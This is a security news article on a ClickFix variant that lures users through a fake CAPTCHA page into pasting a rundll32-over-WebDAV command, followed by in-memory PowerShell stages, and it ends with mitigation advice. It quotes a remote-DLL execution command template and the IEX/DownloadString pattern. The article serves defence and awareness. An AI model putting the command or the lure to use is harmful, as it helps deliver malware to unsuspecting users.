New ClickFix Variant Exploits Rundll32 and WebDAV to Evade Detection
A recent evolution in the ClickFix attack technique has emerged, posing a significant threat to Windows users. This new variant diverges from previous methods by utilizing `rundll32.exe` and WebDAV, two native Windows components, to stealthily deliver and execute malicious payloads. This approach effectively circumvents traditional security measures that primarily monitor script-based threats.
Understanding ClickFix Attacks
ClickFix attacks are sophisticated social engineering schemes designed to deceive users into executing harmful commands on their own systems. Typically, these attacks involve presenting users with fake prompts or error messages that instruct them to perform specific actions, such as opening the Windows Run dialog and entering a command. The commands often appear benign but are crafted to initiate the download and execution of malware.
The New Variant’s Methodology
In this latest iteration, attackers have refined their tactics to enhance stealth and effectiveness:
1. Deceptive Webpage: Victims are directed to a counterfeit website masquerading as a CAPTCHA verification page. An example of such a site is healthybyhillary[.]com, which instructs users to press `Win + R` to open the Run dialog, paste a pre-copied command using `Ctrl + V`, and press `Enter` to execute it. This sequence appears innocuous, making it a potent social engineering tactic.
2. Utilization of Rundll32 and WebDAV: Instead of employing commonly monitored scripting engines like PowerShell, the attack leverages `rundll32.exe` in conjunction with the WebDAV mini-redirector. This combination allows Windows to access remote files over HTTP as if they were local network shares. The malicious DLL is retrieved from an attacker-controlled server using a command such as `rundll32.exe \\server@80\verification.google,#1`, where `#1` refers to an export function by ordinal number, adding a layer of obfuscation.
3. In-Memory Execution: After the initial command execution, the attack proceeds through multiple stages that reside almost entirely in memory. The infection chain transitions to PowerShell at a later stage, utilizing `Invoke-Expression (IEX)` and `Net.WebClient.DownloadString` to fetch and execute additional payloads without writing them to disk. Non-interactive flags like `-NoP` and `-NonI` are employed to minimize detection.
Implications for Security
This advanced approach presents several challenges for cybersecurity defenses:
– Evasion of Detection: By exploiting trusted system tools like `rundll32.exe` and WebDAV, the attack blends seamlessly with legitimate Windows activities. Security solutions that focus on detecting script-based threats may overlook this method, allowing the malware to infiltrate systems undetected.
– Persistence and Stealth: The in-memory execution strategy ensures that the malware operates without leaving traces on the disk, complicating forensic analysis and removal efforts.
Recommendations for Mitigation
To defend against this sophisticated attack vector, organizations and individuals should consider the following measures:
1. User Education: Train users to recognize and avoid executing unsolicited commands or instructions from unverified sources, even if they appear legitimate.
2. Enhanced Monitoring: Implement security solutions capable of detecting anomalies in the behavior of native Windows processes like `rundll32.exe` and monitoring unusual network activities associated with WebDAV.
3. Restrict Unnecessary Features: Disable or limit the use of WebDAV if it is not required for business operations to reduce the attack surface.
4. Regular Updates: Keep all systems and security software up to date to benefit from the latest threat intelligence and protective measures.
By understanding the mechanics of this new ClickFix variant and implementing proactive security practices, organizations can better protect themselves against such evasive threats.
